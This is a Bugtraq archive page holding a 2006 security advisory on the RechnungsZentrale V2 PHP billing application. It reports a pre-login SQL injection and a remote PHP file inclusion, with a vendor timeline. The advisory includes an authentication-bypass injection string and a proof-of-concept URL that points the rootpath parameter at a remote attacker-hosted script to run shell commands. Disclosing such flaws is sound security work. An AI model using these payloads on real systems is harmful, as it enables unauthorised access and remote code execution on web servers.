Home page logo
/

bugtraq logo Bugtraq mailing list archives

RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
From: info () g-0 org
Date: 19 Apr 2006 07:40:03 -0000

    ----------------------------------------------------------------------------------
    - GroundZero Security Research and Software Development 2006                     - 
    ----------------------------------------------------------------------------------
    -                                                                                -
    -  Security Advisory regarding RechnungsZentrale v2.                             -
    -  SQL Injection and Remote File inclusion Vulnerabilities.                      -
    -  Released: Tue Apr 18 18:00:00 CEST 2006                                       -
    -                                                                                -
    ----------------------------------------------------------------------------------



    ----------------------------------------------------------------------------------
    - Affected:                                                                      -
    ----------------------------------------------------------------------------------

    Software:   RechnungsZentrale V2
    Version:    1.1.3, likely older versions are affected aswell.
    Vendor:     http://www.nfec.de/


    ----------------------------------------------------------------------------------
    - Information:                                                                   -
    ----------------------------------------------------------------------------------

    "RechnungsZentrale V2 is a multiuser, Web-based billing application. 
     It facilitates the creation of bills and the management of customers. 
     It is written in PHP and uses MySQL. It supports German, English, French, 
     and Dansk languages."

    The Software contains vulnerabilities which allow an Attacker to conduct
    SQL injection and Remote File inclusion Attacks prior to Authentication.

    The SQL injection vulnerabilitie exists in the login script (authent.php4) and 
    allows an Attacker to log into the internal Interface or execute malicious 
    SQL commands.

    PoC:
        User: ' OR '1'='1
        Password: 1


    In the same script it is possible to include a remote php by pointing the 
    "rootpath=" option to a remote PHP script with a system() or passthru() function.
   
    Doing so would allow an unauthenticated Attacker to execute shell commands with 
    permissions of the Web Server. 

    PoC: 
        http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4


    ----------------------------------------------------------------------------------
    - Vendor Response:                                                               -
    ----------------------------------------------------------------------------------

    Notified:   Tue Apr 18 16:12:14 CEST 2006
    Response:   Tue Apr 18 17:13:14 CEST 2006 
                (Development Discontinued)
    Disclosure: Tue Apr 18 18:00:00 CEST 2006


    ----------------------------------------------------------------------------------
    - Bugs discovered by GroundZero Security Research and Software Development       -
    - http://www.GroundZero-Security.com | Http://www.g-0.org                        -
    ----------------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
  • RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities info (Apr 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]